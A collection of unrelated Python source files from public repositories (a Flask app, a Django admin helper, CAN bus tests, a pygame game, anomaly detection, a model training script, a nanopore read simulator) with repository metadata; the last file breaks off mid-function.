keep_sourdough_at_maintenance(sourdough_model)\n\n # send message back to requester\n message = PerformActionsMessage(actions_to_perform)\n return json.dumps(message.to_dict())\n except Exception as e:\n message_failed = FailedMessage(repr(e))\n return json.dumps(message_failed.to_dict())\n\n\n# A function to check if the user with the given email is saved in the database, and returns the UserModel object.\n# If the user is not in the database, returns an exception.\ndef get_user(email, session) -> UserModel:\n try:\n return session.query(UserModel).filter_by(email=email).one()\n except Exception as e:\n print(f\"User do not exist: {repr(e)}\")\n raise Exception(\"There is no user with this email.\")\n\n\n@app.route('/is_user_in_database', methods=[\"GET\", \"POST\"])\ndef is_user_in_db():\n with Session() as session:\n try:\n data = request.args\n email = data['email']\n if session.query(session.query(UserModel).filter_by(email=email).exists()).scalar():\n message = SuccessMessage(\"Success\")\n return json.dumps(message.to_dict())\n else:\n raise Exception(\"There is no user with this email.\")\n except Exception as e:\n message_failed = FailedMessage(repr(e))\n return json.dumps(message_failed.to_dict())\n\n\nif __name__ == '__main__':\n Base.metadata.create_all(engine)\n app.run()\n","repo_name":"noadudai/sourdough","sub_path":"sourdough/server/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":12701,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"12796995018","text":"\"\"\"\n Author: Cristian Gonzales\n Created for UCSC undergrad course CMPS 128, Fall 2017\n\"\"\"\nfrom flask import Flask\n\n\"\"\"\n Global variables for the entire codebase are initialized here.\n \n Global variables\n --------------------\n :var app: The Flask app to be run (e.g., app.run(...))\n :var local_server: The server for this instance, to be ran 
globally\n :var numOfReplicas: The number of K replicas, as indicated by the environment variable\n :var localIPPort: The localIPPort for this specific instance in the form of IP:PORT (an identifier to query for objects)\n :var KVSDict: The key-value store, global to all \n :var viewList: The global view of all nodes\n :var live_servers: All the live servers, or servers that are \"up\"\n :var absent_servers: All the servers that are \"down\"\n\"\"\"\nclass globals:\n def __init__(self):\n\n global app\n app = Flask(__name__)\n\n global local_server\n\n global numOfReplicas\n\n global localIPPort\n\n global KVSDict\n KVSDict = dict()\n\n global viewList\n viewList = []\n\n global live_servers\n live_servers = []\n\n global absent_servers\n absent_servers = []","repo_name":"Vacio/cmps128","sub_path":"legacy/src/globals.py","file_name":"globals.py","file_ext":"py","file_size_in_byte":1208,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"40463785067","text":"import os\nimport cv2\n\nclass YelpImageDataset(object):\n\tdef __init__(self, path):\n\t\tself.train_imgs = []\n\t\tself.surf_features = []\n\t\tself.sift_features = []\n\t\timages = os.listdir(path)\t\n\t\tfor i in range(len(images)):\n\t\t\tnewpath = '/%s' % images[i]\n\t\t\tnewpath = path + newpath\n\t\t\timg = cv2.imread('%s' % newpath, 0)\n\t\t\tself.train_imgs.append(img)\n\n\tdef define_surf_features(self):\n\t\tsurf = cv2.xfeatures2d.SURF_create(400)\n\t\tsurf.setExtended(True)\n\t\tfor i in range(len(self.train_imgs)):\n\t\t\t(kp, des) = surf.detectAndCompute(self.train_imgs[i], None)\n\t\t\tself.surf_features.append((kp,des))\n\n\tdef define_sift_features(self):\n\t\tsift = cv2.xfeatures2d.SIFT_create()\n\t\tfor i in range(len(self.train_imgs)):\n\t\t\tkp = sift.detectAndCompute(self.train_imgs[i], None)\n\t\t\tself.sift_features.append(kp)\n\n","repo_name":"anGie44/YelpPhotoClassification","sub_path":"scripts/imgData.py","file_name":"imgData.py","file_ext":"py","file_size_in_byte":791,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"19235937724","text":"from django.contrib import admin\n\nfrom .models import (\n UserProfile, Post , Comment, Tender,BirthCertificate,VDetails,Feedback, DeathCertificate\n)\n\n# Register your models here.\nadmin.site.register(UserProfile)\nadmin.site.register(Post)\nadmin.site.register(Comment)\nadmin.site.register(VDetails)\nadmin.site.register(Tender)\nadmin.site.register(Feedback)\nadmin.site.register(BirthCertificate)\nadmin.site.register(DeathCertificate)\n# admin.site.register(OfficeEmployee)\nfrom django.contrib import admin\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth.admin import UserAdmin\nfrom django.forms.models import inlineformset_factory\nfrom django import forms\nfrom django.contrib.auth.forms import UserCreationForm, UserChangeForm\n\n\ndef upgrade_user_admin(UserProfile=None, unique_email=False,\n list_display=None):\n \"\"\"This helper function enhances the built in auth.user admin as follows:\n - If given a UserProfile class, allow it to be edited inline in the\n user admin.\n - Add \"make active\" and \"make inactive\" actions to the actions dropdown\n - Alters list_display if provided\n - Add date joined and last login filters\n - Add the email field to the first step when creating a user\n - Optionally enforce unique emails at the form level\n Usage:\n from upgrade_user_admin import upgrade_user_admin\n from myapp.models import 
MyUserProfile\n upgrade_user_admin(\n UserProfile=MyUserProfile, unique_email=True,\n list_display=['email', 'first_name', 'last_name'])\n \"\"\"\n if UserProfile:\n class UserProfileFormSet(inlineformset_factory(User, UserProfile)):\n def __init__(self, *args, **kwargs):\n super(UserProfileFormSet, self).__init__(*args, **kwargs)\n self.can_delete = False\n\n # Allow user profiles to be edited inline with User\n class UserProfileInline(admin.StackedInline):\n model = UserProfile\n fk_name = 'user'\n max_num = 1\n extra = 0\n formset = UserProfileFormSet\n\n # use these form classes to enforce unique emails, if required\n class UniqueEmailForm:\n def clean_email(self):\n qs = User.objects.filter(email=self.cleaned_data['email'])\n if self.instance:\n qs = qs.exclude(pk=self.instance.pk)\n if qs.count():\n raise forms.ValidationError(\n 'That email address is already in use')\n else:\n return self.cleaned_data['email']\n\n class MyUserChangeForm(UniqueEmailForm, UserChangeForm):\n email = forms.EmailField(required=True)\n\n class MyUserCreationForm(UniqueEmailForm, UserCreationForm):\n email = forms.EmailField(required=True)\n\n class MyUserAdmin(UserAdmin):\n # add the email field in to the initial add_user form\n add_fieldsets = (\n (None, {\n 'classes': ('wide',),\n 'fields': ('username', 'email', 'password1', 'password2')\n }),\n )\n\n inlines = [UserProfileInline, ] if UserProfile else []\n actions = ['make_active', 'make_inactive']\n list_filter = ['is_active', 'is_staff', 'is_superuser', 'date_joined',\n 'last_login']\n\n form = MyUserChangeForm if unique_email else UserChangeForm\n add_form = MyUserCreationForm if unique_email else UserCreationForm\n\n def make_active(self, request, queryset):\n rows_updated = queryset.update(is_active=True)\n if rows_updated == 1:\n message_bit = \"1 person was\"\n else:\n message_bit = \"%s people were\" % rows_updated\n self.message_user(\n request, \"%s successfully made active.\" % message_bit)\n\n def make_inactive(self, request, queryset):\n rows_updated = queryset.update(is_active=False)\n if rows_updated == 1:\n message_bit = \"1 person was\"\n else:\n message_bit = \"%s people were\" % rows_updated\n self.message_user(\n request, \"%s successfully made inactive.\" % message_bit)\n\n if list_display:\n MyUserAdmin.list_display = list_display\n\n # Re-register UserAdmin with custom options\n admin.site.unregister(User)\n admin.site.register(User, MyUserAdmin)\n","repo_name":"Nizam35/GramPanchayath","sub_path":"mysite/grama/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":4438,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"14828491091","text":"#############################################################################################################\n\n## Description : This codes is for test two USB2CAN module commuincation\n## on one Raspberry Pi. 
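\n## A minimal python-can round-trip (a sketch of the pattern this script automates):\n##     bus = can.interface.Bus(channel = 'can0', bustype = 'socketcan')\n##     bus.send(can.Message(arbitration_id=0x123, data=[0, 1, 2, 3]))\n##     print(bus.recv(10.0))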
\n## CAN0 send base frame/extended frame/remote frame\n## CAN1 receivd frame and print \n\n## Author : Calvin (calvin@inno-maker.com)/ www.inno-maker.com\n \n \n## Date : 2022.08.01\n\n## Environment : Hardware ---------------------- Raspberry Pi 4\n## SYstem of RPI ---------------------- 2022-04-04-raspbian-buster-full.img 64 bit\n## Version of Python ---------------------- Python 3.7.3(Default in the system)\n## Toinstall dependencies:\n## sudo pip3 install python-can\n\n#############################################################################################################\nimport os\nimport can\n\ndef can_test():\n #Set CAN0 speed to 1M bps\n os.system('sudo ifconfig can0 down')\n os.system('sudo ip link set can0 type can bitrate 1000000')\n os.system(\"sudo ifconfig can0 txqueuelen 100000\")\n os.system('sudo ifconfig can0 up')\n\n #Set CAN1 speed to 1M bps\n os.system('sudo ifconfig can1 down')\n os.system('sudo ip link set can1 type can bitrate 1000000')\n os.system(\"sudo ifconfig can1 txqueuelen 100000\")\n os.system('sudo ifconfig can1 up')\n \n can0 = can.interface.Bus(channel = 'can0', bustype = 'socketcan')\n can1 = can.interface.Bus(channel = 'can1', bustype = 'socketcan')\n \n ## CAN0 send Base frame , CAN 1 receive this frame and print. \n sff_frame = can.Message(arbitration_id=0x123, data=[0,1,2,3,4,5,6,7])\n can0.send(sff_frame)\n msg = can1.recv(10.0)\n if msg is None:\n print(\"USB2CAN hardware connection failure.\")\n else:\n print(f\"Received base frame: \\n{msg}\\n\")\n ###################################################################### \n ## CAN0 send extended frame, CAN 1 receive this frame and print. \n eff_frame = can.Message(arbitration_id=0x1FFF6666, data=[7,6,5,4,3,2,1,0],is_extended_id = True)\n can0.send(eff_frame)\n msg = can1.recv(10.0)\n if msg is None:\n print(\"USB2CAN hardware connection failure.\")\n else:\n print(f\"Received extended frame: \\n{msg}\\n\")\n ###################################################################### \n ##CAN0 send remote frame, CAN 1 receive this frame and print.\n rtr_frame = can.Message(arbitration_id=0x321, data=[0,1,2,3,4,5,6,7],is_remote_frame = True) \n can0.send(rtr_frame)\n msg = can1.recv(10.0)\n if msg is None:\n print(\"USB2CAN hardware connection failure.\")\n else:\n print(f\"Received remote frame: \\n{msg}\\n\") \n ###################################################################### \n os.system('sudo ifconfig can1 down')\n os.system('sudo ifconfig can0 down')\n \n \nif __name__ == '__main__':\n can_test()\n\n\n\n","repo_name":"INNO-MAKER/usb2can","sub_path":"For Linux Raspbian Ubuntu/software/python3/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":3000,"program_lang":"python","lang":"en","doc_type":"code","stars":59,"dataset":"github-code","pt":"31"} +{"seq_id":"17943782863","text":"import pygame\nimport sys\nfrom game.player import Player\nfrom game.level1 import Level1\n\nSCREEN_WIDTH = 1000\nSCREEN_HEIGHT = 700\n\n\ndef main():\n pygame.init()\n\n screen = pygame.display.set_mode((SCREEN_WIDTH, SCREEN_HEIGHT), 0, 32)\n pygame.display.set_caption('Cross Dimensional Platformer')\n\n player_image = pygame.image.load(\"img/anim1.png\").convert_alpha()\n player_image = pygame.transform.scale(player_image, (60, 60))\n\n background_image1 = pygame.image.load(\"img/Hills Layer 01.png\").convert_alpha()\n background_image1 = pygame.transform.scale(background_image1, (SCREEN_WIDTH, SCREEN_HEIGHT))\n\n background_image2 = pygame.image.load(\"img/Hills Layer 02.png\").convert_alpha()\n 
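# (These five parallax layers are each loaded and scaled the same way; an\n    # equivalent loop-based sketch, assuming the \"img/Hills Layer 0N.png\" naming:\n    #\n    #     background_layers = []\n    #     for n in range(1, 6):\n    #         layer = pygame.image.load(\"img/Hills Layer 0%d.png\" % n).convert_alpha()\n    #         layer = pygame.transform.scale(layer, (SCREEN_WIDTH, SCREEN_HEIGHT))\n    #         background_layers.append(layer)\n    #\n    # then blit them in order each frame.)\n    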
background_image2 = pygame.transform.scale(background_image2, (SCREEN_WIDTH, SCREEN_HEIGHT))\n\n background_image3 = pygame.image.load(\"img/Hills Layer 03.png\").convert_alpha()\n background_image3 = pygame.transform.scale(background_image3, (SCREEN_WIDTH, SCREEN_HEIGHT))\n\n background_image4 = pygame.image.load(\"img/Hills Layer 04.png\").convert_alpha()\n background_image4 = pygame.transform.scale(background_image4, (SCREEN_WIDTH, SCREEN_HEIGHT))\n\n background_image5 = pygame.image.load(\"img/Hills Layer 05.png\").convert_alpha()\n background_image5 = pygame.transform.scale(background_image5, (SCREEN_WIDTH, SCREEN_HEIGHT))\n\n player = Player(player_image, SCREEN_WIDTH)\n current_level = Level1(player)\n\n sprite_list = pygame.sprite.Group()\n sprite_list.add(player)\n\n while True:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n sys.exit()\n\n if not current_level.level_passed:\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_RIGHT:\n player.move_right = True\n elif event.key == pygame.K_LEFT:\n player.move_left = True\n elif event.key == pygame.K_UP:\n player.jump()\n elif event.key == pygame.K_f:\n current_level.handle_rift_close()\n\n if event.type == pygame.KEYUP:\n if event.key == pygame.K_RIGHT:\n player.move_right = False\n elif event.key == pygame.K_LEFT:\n player.move_left = False\n\n screen.fill((0, 0, 0))\n sprite_list.update()\n current_level.update()\n\n screen.blit(background_image1, (0, 0))\n screen.blit(background_image2, (0, 0))\n screen.blit(background_image3, (0, 0))\n screen.blit(background_image4, (0, 0))\n screen.blit(background_image5, (0, 0))\n\n current_level.draw(screen)\n sprite_list.draw(screen)\n\n if current_level.level_passed:\n large_text = pygame.font.Font('freesansbold.ttf', 115)\n text_surface = large_text.render(\"Level Passed!\", True, (0, 0, 0))\n text_rect = text_surface.get_rect()\n text_rect.center = ((SCREEN_WIDTH / 2), (SCREEN_HEIGHT / 2))\n screen.blit(text_surface, text_rect)\n player.move_left = False\n player.move_right = False\n\n pygame.display.flip()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"andy-wojciechowski/msoe-spring-game-jam-2019","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3303,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"22160336339","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jan 5 12:46:55 2018\n\n@author: Joe\n\"\"\"\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom scipy.stats import multivariate_normal\nfrom sklearn.metrics import f1_score\n\nplt.style.use('ggplot')\nplt.rcParams['font.family'] = 'serif'\nplt.rcParams['font.serif'] = 'Ubuntu'\nplt.rcParams['font.monospace'] = 'Ubuntu Mono'\nplt.rcParams['font.size'] = 12\nplt.rcParams['axes.labelsize'] = 11\nplt.rcParams['axes.labelweight'] = 'bold'\nplt.rcParams['axes.titlesize'] = 12\nplt.rcParams['xtick.labelsize'] = 9\nplt.rcParams['ytick.labelsize'] = 9\nplt.rcParams['legend.fontsize'] = 11\nplt.rcParams['figure.titlesize'] = 13\n\n\ndef feature_normalize(dataset):\n mu = np.mean(dataset,axis=0)\n sigma = np.std(dataset,axis=0)\n return (dataset - mu)/sigma\n\ndef estimateGaussian(dataset):\n mu = np.mean(dataset, axis=0)\n sigma = np.cov(dataset.T)\n return mu, sigma\n \ndef multivariateGaussian(dataset,mu,sigma):\n p = multivariate_normal(mean=mu, cov=sigma)\n return p.pdf(dataset)\n\ndef selectThresholdByCV(probs,gt):\n best_epsilon = 
0\n best_f1 = 0\n f = 0\n stepsize = (max(probs) - min(probs)) / 1000;\n epsilons = np.arange(min(probs),max(probs),stepsize)\n for epsilon in np.nditer(epsilons):\n predictions = (probs < epsilon) \n f = f1_score(gt, predictions,average='binary')\n if f > best_f1:\n best_f1 = f\n best_epsilon = epsilon\n \n return best_f1, best_epsilon\n\ntr_data = pd.read_csv('tr_server_data.csv')\ncv_data = pd.read_csv('cv_server_data.csv')\ngt_data = pd.read_csv('gt_server_data.csv')\n\nn_training_samples = tr_data.shape[0]\nn_dim = tr_data.shape[1]\n\nprint('Number of datapoints in training set: %d' % n_training_samples)\nprint('Number of dimensions/features: %d' % n_dim)\n\n\nL = tr_data.iloc[:,0]\nT = tr_data.iloc[:,1]\n\nplt.xlabel('Latency (ms)')\nplt.ylabel('Throughput (mb/s)')\nplt.plot(L,T,'bx')\nplt.show()\n\nmu, sigma = estimateGaussian(tr_data)\np = multivariateGaussian(tr_data,mu,sigma)\n\n#selecting optimal value of epsilon using cross validation\np_cv = multivariateGaussian(cv_data,mu,sigma)\nfscore, ep = selectThresholdByCV(p_cv,gt_data)\nprint(fscore, ep)\n\n#selecting outlier datapoints \n\noutliers = np.asarray(np.where(p < ep))\n\nolist = outliers[0].tolist()\n\n\nplt.figure()\nplt.xlabel('Latency (ms)')\nplt.ylabel('Throughput (mb/s)')\nplt.plot(L,T,'bx')\n\nplt.plot(tr_data.iloc[olist,[0]], tr_data.iloc[olist,[1]],'ro')\nplt.show()\n\n\n","repo_name":"lizhi97/MachineLearning-scikit-learn","sub_path":"Anomaly-Detection/detection_Gaussian.py","file_name":"detection_Gaussian.py","file_ext":"py","file_size_in_byte":2500,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"13709951517","text":"\"\"\"\nTraining model\n\nReference: https://github.com/piergiaj/pytorch-i3d\nEdited by Shen Jie Koh\n\"\"\"\n#此程式為論文原作者程式修改而來\n#可刪除RGB模式\n#可以run,但要改loss function算法和重新架構程式\n\nimport os\nos.environ[\"CUDA_DEVICE_ORDER\"]=\"PCI_BUS_ID\" \nos.environ[\"CUDA_VISIBLE_DEVICES\"]='1'\nimport sys\nimport argparse\n\nparser = argparse.ArgumentParser()\nparser.add_argument('-mode', type=str, help='rgb or depth')\nparser.add_argument('-save_model', type=str)\nparser.add_argument('-root', type=str)\n\nargs = parser.parse_args()\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nfrom torch.optim import lr_scheduler\nfrom torch.autograd import Variable\nimport torchvision\n\nimport numpy as np\n\nfrom pytorch_i3d import InceptionI3d\n\nfrom dataset import FloorDataset as Dataset\n\ndef run(init_lr=0.1, max_steps=64e3, mode='depth', root='', csv_file='', batch_size=1, save_model='testing'):\n # setup dataset\n if mode == 'depth':\n root = '../data/train'\n csv_file = 'csv_file/depth.csv'\n else:\n root = '../data/train' #後續需刪除RGB mode\n csv_file = 'csv_file/rgb.csv'\n \n dataset = Dataset(csv_file, root)\n train_set_size = int(len(dataset)*0.8)\n val_set_size = len(dataset) - train_set_size\n train_dataset, val_dataset = torch.utils.data.random_split(dataset, [train_set_size, val_set_size])\n \n train_dataloader = torch.utils.data.DataLoader(train_dataset, batch_size=batch_size, shuffle=True)\n val_dataloader = torch.utils.data.DataLoader(val_dataset, batch_size=batch_size, shuffle=True) \n\n dataloaders = {'train': train_dataloader, 'val': val_dataloader}\n datasets = {'train': train_dataset, 'val': val_dataset}\n\n # setup the model\n if mode == 'depth':\n i3d = InceptionI3d(14, in_channels=1)\n #i3d.load_state_dict(torch.load('models/flow_imagenet.pt'))\n else:\n i3d = InceptionI3d(14, in_channels=3)\n 
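# (Checkpoint note, a sketch only: the commented-out save further below uses\n        # i3d.module.state_dict(), i.e. weights without the DataParallel 'module.'\n        # prefix, so resuming would load them before the nn.DataParallel wrap:\n        #\n        #     state = torch.load('/ssd/models/000920.pt')  # path from the comment below\n        #     i3d.load_state_dict(state)\n        # )\n        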
#i3d.load_state_dict(torch.load('models/rgb_imagenet.pt'))\n    i3d.replace_logits(14)\n    #i3d.load_state_dict(torch.load('/ssd/models/000920.pt'))\n    i3d.cuda()\n    i3d = nn.DataParallel(i3d)\n\n    lr = init_lr\n    optimizer = optim.SGD(i3d.parameters(), lr=lr, momentum=0.9, weight_decay=0.0000001)\n    lr_sched = lr_scheduler.MultiStepLR(optimizer, [300, 1000])\n\n    num_steps_per_update = 4 # accum gradient\n    steps = 0\n    # train it\n    while steps < max_steps:#for epoch in range(num_epochs):\n        print('Step {}/{}'.format(steps, max_steps))\n        print('-' * 10)\n\n        # Each epoch has a training and validation phase\n        for phase in ['train', 'val']:\n            if phase == 'train':\n                i3d.train(True)\n            else:\n                i3d.train(False) # Set model to evaluate mode\n            \n            tot_loss = 0.0\n            tot_loc_loss = 0.0\n            tot_cls_loss = 0.0\n            num_iter = 0\n            optimizer.zero_grad()\n            \n            # Iterate over data.\n            for data in dataloaders[phase]:\n                num_iter += 1\n                # get the inputs\n                inputs, labels, path = data\n\n                # wrap them in Variable\n                inputs = Variable(inputs.cuda())\n                #t = inputs.size(2)\n                labels = Variable(labels.cuda())\n                \n                per_frame_logits = i3d(inputs)\n                \n                \n                # upsample to input size\n                #per_frame_logits = F.upsample(per_frame_logits, t, mode='linear')\n                #print(per_frame_logits.size())\n                #print(labels.size())\n\n                # compute localization loss (per-frame BCE with logits, as in the reference pytorch-i3d code)\n                loc_loss = F.binary_cross_entropy_with_logits(per_frame_logits, labels)\n                #tot_loc_loss += loc_loss.data[0]\n                tot_loc_loss += loc_loss.item()\n\n                # compute classification loss (with max-pooling along time B x C x T)\n                cls_loss = F.binary_cross_entropy_with_logits(torch.max(per_frame_logits, dim=2)[0], torch.max(labels, dim=2)[0])\n                #tot_cls_loss += cls_loss.data[0]\n                tot_cls_loss += cls_loss.item()\n\n                loss = (0.5*loc_loss + 0.5*cls_loss)/num_steps_per_update\n                #tot_loss += loss.data[0]\n                tot_loss += loss.item()\n                loss.backward()\n\n                if num_iter == num_steps_per_update and phase == 'train':\n                    steps += 1\n                    num_iter = 0\n                    optimizer.step()\n                    optimizer.zero_grad()\n                    lr_sched.step()\n                    if steps % 10 == 0:\n                        print('{} Loc Loss: {:.4f} Cls Loss: {:.4f} Tot Loss: {:.4f}'.format(phase, tot_loc_loss/(10*num_steps_per_update), tot_cls_loss/(10*num_steps_per_update), tot_loss/10))\n                        # save model\n                        #torch.save(i3d.module.state_dict(), save_model+str(steps).zfill(6)+'.pt')\n                        tot_loss = tot_loc_loss = tot_cls_loss = 0.\n            if phase == 'val':\n                print('{} Loc Loss: {:.4f} Cls Loss: {:.4f} Tot Loss: {:.4f}'.format(phase, tot_loc_loss/num_iter, tot_cls_loss/num_iter, (tot_loss*num_steps_per_update)/num_iter))\n    \n\n\nif __name__ == '__main__':\n    # need to add argparse\n    run(mode=args.mode, root=args.root, save_model=args.save_model)\n","repo_name":"shenjiekoh/gesture-recognition-l515","sub_path":"train_model.py","file_name":"train_model.py","file_ext":"py","file_size_in_byte":5395,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"}
+{"seq_id":"20352863559","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom astropy.io import fits\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndef fit_inactive_sequence():\n\n    deg = 3\n    target_url = ('https://zenodo.org/record/2636692/files/'\n                  'MLSDSS-GaiaDR2_extended.fits?download=1')\n    mlsdss = fits.open(target_url)\n    \n    r_ext = mlsdss[1].data['EXTINCTION'][:,2]\n    z_ext = mlsdss[1].data['EXTINCTION'][:,4]\n    ext = r_ext-z_ext\n    mask_ext = ext < 0.1\n    subred = (mlsdss[1].data['photometric_sample_subred'] == 1) * mask_ext \n    \n    ewha = mlsdss[1].data['EWHA'][subred]\n    color = (mlsdss[1].data['phot_g_mean_mag'][subred] \n             - 
mlsdss[1].data['phot_rp_mean_mag'][subred])\n \n mask_nan = ~np.isnan(color+ewha)* (ewha < 1)\n color1,ewha1 = color[mask_nan],ewha[mask_nan]\n \n p = np.polyfit(color1,ewha1,deg)\n #mask = abs(np.polyval(p,color1)-ewha1) < 0.2\n #for i in range(2):\n # p = np.polyfit(color1[mask],ewha1[mask],deg)\n # mask = abs(np.polyval(p,color1)-ewha1) < 0.2 \n \n x = np.linspace(0.8,1.5,10)\n \n plt.plot(color,ewha,'.')\n plt.plot(x,np.polyval(p,x),'-k')\n plt.ylim(-3,4)\n plt.xlim(0.8,1.5)\n plt.show()\n \n print(p)\n \nfit_inactive_sequence()","repo_name":"rkiman/M-dwarfs-Age-Activity-Relation","sub_path":"src/fit_inactive_seq.py","file_name":"fit_inactive_seq.py","file_ext":"py","file_size_in_byte":1249,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"36292945280","text":"#!C:\\Anaconda3\\python.exe\n\nimport numpy as np\nimport pandas as pd\nimport os\n\n\ncp = pd.read_clipboard(sep='\\t')\nprint(cp)\n\ncp.to_json('df.json', orient='records', lines=True)\nos.remove(\"./df.json\")\n\n# Data\ntextMatrix = [(\"Earth\", \"Sphere\", \"Geoid\"), (\"Matter\", \"Particle\", \"Wave\"), (\"Magnet\", \"Flex\", \"Electricity\")];\n\n# Create a DataFrame\ndf = pd.DataFrame(data=textMatrix);\n\n# Copy DataFrame contents to clipboard\ndf.to_clipboard(sep=\"\\t\");\n","repo_name":"xiaolongjia/techTrees","sub_path":"Python/02_DataEngineering/Pandas/04_read_clipboard.py","file_name":"04_read_clipboard.py","file_ext":"py","file_size_in_byte":442,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"25878403152","text":"'''\nModify the turtle walk program so that you have two turtles each with\na random starting location. Keep the turtles moving until one of them\nleaves the screen.\n'''\n\nimport random\nimport turtle\n\n# Initializing boht turtles\nt1 = turtle.Turtle()\nt2 = turtle.Turtle()\nwindow = turtle.Screen()\n\n# Initializing shape of turtles\nt1.shape('square')\nt2.shape('circle')\n\n# Boundaries of window.\nleftBound = -window.window_width() / 2\nrightBound= window.window_width() / 2\ntopBound = window.window_height() / 2\nbottomBound = -window.window_height() / 2\n\n\n# Random movement of turtle\ndef moveRandom(window, t):\n coin = random.randrange(0,2)\n if coin == 0:\n t.left(90)\n else:\n t.right(90)\n\n t.forward(50)\n\n\n# Collision Detection\ndef collision_detection(t1, t2):\n if t1.distance(t2) < 2:\n return True\n else:\n return False\n\n\n# Check to see if both turtles are on the screen/window\ndef check_on_screen(w, t):\n # Boundaries of window.\n leftBound = -window.window_width() / 2\n rightBound= window.window_width() / 2\n topBound = window.window_height() / 2\n bottomBound = -window.window_height() / 2 \n\n turtleX = t.xcor()\n turtleY = t.ycor()\n\n stillIn = True\n if turtleX < leftBound or turtleX > rightBound:\n stillIn = False\n if turtleY < bottomBound or turtleY > topBound:\n stillIn = False\n return stillIn\n\n\n# t1 random movements\nt1.up()\n# random.uniform vs random.randrange\n# https://stackoverflow.com/questions/26784252/non-integer-arg-1-for-randrange-in-python-libary\nt1.goto(random.uniform(leftBound, rightBound),\n random.uniform(bottomBound, topBound))\nt1.setheading(random.randrange(0, 360))\nt1.down()\n\n#t2 random movements\n# random.uniform vs random.randrange\n# https://stackoverflow.com/questions/26784252/non-integer-arg-1-for-randrange-in-python-libary\nt2.up()\nt2.goto(random.uniform(leftBound, rightBound),\n random.uniform(bottomBound, 
topBound))\nt2.setheading(random.randrange(0, 360))\nt2.down()\n\n\nwhile check_on_screen(window, t1) and check_on_screen(window, t2):\n moveRandom(window, t1)\n moveRandom(window, t2)\n\n\nwindow.exitonclick()\n","repo_name":"KenjaminButton/runestone_thinkcspy","sub_path":"8_more_about_iteration/exercises/8.14.5.py","file_name":"8.14.5.py","file_ext":"py","file_size_in_byte":2147,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"27862149116","text":"\"\"\"\n The main function of this script is to simulate negative samples or normal samples\nfor multi-sample nanopore sequencing data. \n The simulation scheme of negative samples is mainly: \n 1) The adapter sequence and the barcode sequence are missing. \n 2) The absence of the barcode sequence. \n 3) Incomplete barcode sequence (More than 40 percent missing).\n The normal sequence: <-----------><-------------><--------------><-------------><----------->\n topAdapter topBarcode read endBarcode endAdapter\n\"\"\"\nimport random\nimport sys\nimport argparse\nimport os\nif 'script' not in sys.path:\n sys.path.append('script')\nfrom ex_info_from_read import getSeqsFromFasta as GSFF\nfrom ex_info_from_read import writeSeqs2Fasta as S2F\nfrom ex_info_from_read import get_seq_list, get_id_list\nif 'module/simulateNanoSigs' not in sys.path:\n sys.path.append('module/simulateNanoSigs')\nif 'module/simulateNanoSigs/module/' not in sys.path:\n sys.path.append('module/simulateNanoSigs')\nfrom generatNoiseSignal import sequence_to_true_signal\nfrom multiprocessing import Pool\n\nimport Bio.SeqIO\nfrom badread.simulate import sequence_fragment, ErrorModel, QScoreModel, Identities\nMISBASELINE = 0.6\n\n# ERRORMODELIST = [1, 2, 3] # If there is a normal sequence, change to [0, 0,...,0, 1, 2, 3], \n # the number of '0' controls the probability of normal sequence occurrence.\n# ERRORMODELIST = [0] # If we only want the data that was successfully barcoded, ERRORMODELIST is equal to [0].\n\ndef reverse_complement(dna_sequence):\n complement_dict = {'A': 'T', 'T': 'A', 'C': 'G', 'G': 'C'}\n reverse_complement_seq = ''.join([complement_dict[base] for base in reversed(dna_sequence)])\n return reverse_complement_seq\n\ndef sim_read(perfect_read, error_model = 'nanopore2023', qscore_model = 'nanopore2023', identities = '95,5,99'):\n \"\"\"Simulate error into perfect read using Badread error and qscore model\n\n read (str): perfect reads\n \"\"\"\n output=sys.stderr\n mean, sd, maxi = [float(x) for x in identities.split(',')]\n identities = Identities(mean, sd, maxi, output)\n\n error_model = ErrorModel(error_model, output)\n qscore_model = QScoreModel(qscore_model, output)\n\n seq, quals, actual_identity, identity_by_qscores = \\\n sequence_fragment(perfect_read, identities.get_identity(), \n error_model, qscore_model)\n return seq\n\ndef generateRefNegseq(topAdapter = \"\", \\\n topBarcode = \"\", \\\n read = \"\", \\\n endAdapter = \"\", \\\n endBarcode = \"\", \\\n errorMode = 1, \\\n libaryMode = 'ONTMUTISAMPLE'):\n \"\"\"\n When the libaryMode == 'ONTMUTISAMPLE':\n The correct sequence: <-----------><-------------><--------------><-------------><----------->\n topAdapter topBarcode read endBarcode endAdapter\n The main characteristic of the failed sequence (negative sample sequence) is the absence of barcode.\n \"\"\"\n\n if libaryMode == 'ONTMUTISAMPLE': # No error.\n if errorMode == 0:\n refRead = topAdapter + topBarcode + read + endBarcode + endAdapter\n return refRead\n elif errorMode == 1: # The 
